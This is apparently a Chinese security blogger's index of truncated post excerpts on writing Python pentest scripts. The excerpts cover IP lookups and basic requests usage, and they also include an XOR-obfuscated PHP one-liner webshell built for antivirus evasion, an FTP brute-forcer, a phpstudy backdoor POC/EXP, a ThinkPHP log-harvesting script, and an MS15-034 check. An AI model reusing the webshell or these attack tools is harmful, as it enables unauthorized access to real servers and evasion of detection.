划水的小白白

文章目录一、需求二、实现代码三、运行结果一、需求在ipip查询一个IP的信息，但是仅仅想知道这个IP是不是IDC或者基站的信息。如下图，ipip貌似也没有提供相对于的代码，直接burp抓包，看看没签名就可以整一个小脚本。 主要涉及到Python的返回数据解析问题。二、实现代码import requestsimport timefrom bs4 import BeautifulSoupdef get_ipinfo(ip): #print(ip) url = "ht

文章目录一、需求二、具体脚本一、需求有一个" aa.csv "文件，内容如下：现在只要第三列的IP字段，且将IPV4与IPV6分开。且分开得到的IPV6，要改为 " x:x:x:x:0000:0000:0000:0000/64 " 这种格式。其实这种处理python文件的脚本很简单，知识之前没怎么写过，这里记录一下。二、具体脚本# -*- coding:utf8 -*-import csv# 读取csvcsvFile = open("/Users/xx/.csv"

文章目录1、前言2、原理3、初步实现代码4、补充说明5、多线程代码1、前言 之前在P神网站上看到采用异或的思路达到免杀的效果， 感觉挺有意思，无聊在周末写一个脚本批量生成2、原理其实，原理也挺简单的，即使用 ('6'^'w') 代替字母“ a ”。具体完整的一句话为： <?php $a=('6'^'w').'ssert';$a($_POST[8]);?>问题一： 为什么 ('6'^'w') == a ?6对应的ascii码是54；w对应的ascii码是11

采用队列的思路，避免了划分文件的代码，提高了代码的整体简约/阅读性import ftplibimport sysimport threadingimport queuedef ftp_brute(ip,port): ftp = ftplib.FTP() ftp.connect(ip,int(port)) white not q.empty(): dict = q.get() dict = dict.split('|') u

文章目录1.前言2.POC2.1代码如下：2.2使用方法：3.EXP3.1代码如下：3.2使用方法：1.前言最近发现还是有部分网站存在着phpstudy后门的。直接给出poc与exp。2.POC2.1代码如下：import requestsimport base64import reshell = "printf(md5('mss'));"shell_base64 = base64.b64encode(shell.encode('utf-8'))url = "http://127.0

文章目录1.源代码2.使用方法3.使用效果：1.源代码许多使用thinkphp的网站都默认开启了日志功能，这是很危险的。因为这些日志一般可以被未授权访问，且存在大量敏感信息。编写针对 thinkphp3.x 的一个利用小脚本。import requestsimport sysdef addurls(year): url = "http://www.webhack123.com/App/Runtime/Logs" urls=[] for month in range(

一、思路：二、工具初始化2.1 定义banner函数2.2 定义usage函数三、从命令行中获取参数3.1 用到的库：3.2 用法示例：3.2.1 打印出获取到的参数及其类型3.2.2 将获取的数据依次输出3.2.3 将获取后的参数，赋值后输出四、字典文件的读取与分配4.1 回顾with...as...结构4.2 为多线程分配字典4.3 优化（上边的程序有一定的问题）五、多线程访问5.1 使用函数5.2 函数用法5.3 原理理解5.4 最终代码（重要）六、总结写一个工具

一、简介1.为什么要引入多线程？总结：引入并发，就是为了提升程序运行速度2.有哪些程序提速的方法补充：在多线程并发中，cup与io是可以同时运行的。单个CPU场景下，单线程的原理：Cup处理一部分时，调用IO来处理，这个时候，cpu等着io处理完。然后在继续上次未完成的事情继续。-------------------------------------------------------------单个CPU场景下，多线程的原理：Cup处理一部分时，调用IO来处理，这个时候

前言：这是对之前文章内容的总结：使用方法：python3 work.py url如：python3 work.py 192.168.26.133源码：import requestsimport sys#url = "http://192.168.26.133"url = sys.argv[1]#定义基本属性headers = {"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Geck

漏洞原理1. 一些问题 问： 为什么有成熟的工具了，我们还需要自己编写？ 答： 一些漏洞刚刚被披露出来的时候，网上是没有对应的工具的。 这个时候就要求我们根据漏洞原理写出对应的POC代码，用来验证漏洞是否存在。2. 本文以ms15-034为例子。原理的话，本文就不占用篇幅取介绍了，可以自行百度。复现的话，本机装一个win7 sp1，开启iis服务即可。Win 7安装iis 7组件：https://jingyan.baidu.com/article/2fb0ba409

结果：import requestsurl = 'http://195.200.176.186/' #此IP是从fofa上任意找的r = requests.get(url)print(r.headers)小优化（人性化输出）：import requestsurl = 'http://195.200.176.186/' #此IP是从fofa上任意找的r = requests.get(url)print(r.headers)print("="*15)prin

一、工具原理漏洞原理和危害不在赘述，可以去这看看：https://www.cnblogs.com/-mo-/p/11295400.html使用HTTP options方法可以探测出服务器支持的HTTP方法二、工具编写：确认目标服务器发送OPTIONS请求确认结果中是否具有MOVE PUT结果：,,是字符串时，我们就可以通过find来寻找后续可以导入“ sys ”模块，来进行传递url定向扫描。find方法详细使用说明：https://www.runoob.co

一、原理读取字典文件 拼接URL发送HTTP GET请求URL判断返回状态码信息，输出存在的目录二、字典文件读取with open(“filename.txt”,”r”) as f: #使用with .. as ..会自动关闭文件流；使用f = open(“filename.txt”,”r”) #需要close关闭文件流。#至于为什么非要关闭io流：https://www.zhihu.com/question/46263042.f.readline() #每次读取1行

代理服务器的设置前提：提前打开burp，监听默认的8080端口结果：代码：import requestsurl = "https://www.baidu.com"proxy = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}#设置代理服务器地址以及端口，这里是本地测试所以用的127.0.0.1r = requests.get(url,proxies = proxy,verify = False)

前提准备：登录页面1.html<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>haha</title></head><body> <form action="work1.php" method="get">

前言：好久没怎么写过代码了，最近来复习一下。简单脚本之获取返回状态码源码：import requestsurl = "https://www.baidu.com" #设置url为百度r = requests.get(url=url)print(r.url) #输出获取到的urlprint(r.status_code) #输出服务器返回状态码结果：简单脚本之获取请求url其实在上一个示例中，